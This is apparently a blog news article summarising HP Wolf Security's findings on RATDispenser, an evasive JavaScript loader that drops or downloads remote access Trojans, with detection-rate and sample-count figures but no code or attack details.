This New Malware Can Evade Almost All Antiviruses

Malware is any software that is created with the goal of causing harm to a computer, server, client, or network. Malware is sometimes defined as software that secretly acts against the user’s best interests. To assist protect against the introduction of malware, detect it if it is already there, and recover from malware-related destructive activities and attacks, a variety of antivirus software, firewalls, and other measures are utilized.

A new kind of malwares have been found by HP Security researchers, in which using an evasive JavaScript loader, attackers are distributing remote access Trojans (RATs) and information stealers.  Security researchers at HP Wolf Security called the malware RATDispenser and have published a research blog on this malware. While JavaScript downloaders normally have a lower detection rate than other downloaders, saying that this specific malware is especially dangerous since it employs numerous tactics to elude detection.

Courtesy: HP Research

According to the blog, RATDispenser appears to be adept at evading security safeguards and delivering malware, with an 11 percent detection rate. During the year 2021, the researchers discovered eight malware families that were spread utilizing this virus. All of the payloads were remote access Trojans (RATs), which were designed to steal data and allow attackers control over target machines.

RATDispenser is used to obtain an initial footing on a system, as is the case with most JavaScript malware attacks, before launching secondary malware that takes control of the infected device. Surprisingly, we discovered that RATDispenser is mostly utilized as a dropper (in 94 percent of the samples examined), implying that the malware does not communicate over the network to deliver a dangerous payload. The authors of RATDispenser may be using a malware-as-a-service business model, given the diversity of malware families available, many of which can be purchased or downloaded for free from underground marketplaces, and malware operators’ propensity for dropping payloads.

Overview of RATDispenser variants and the malware families they delivered ((image and Caption Credit: HP)

Further investigation revealed that there were at least three different RATDispenser variations for a total of 155 samples over the last three months. While the bulk of these copies were droppers, ten of them were downloaders that communicated over the network in order to obtain a secondary stage of malware.

Leave a Reply

Your email address will not be published. Required fields are marked *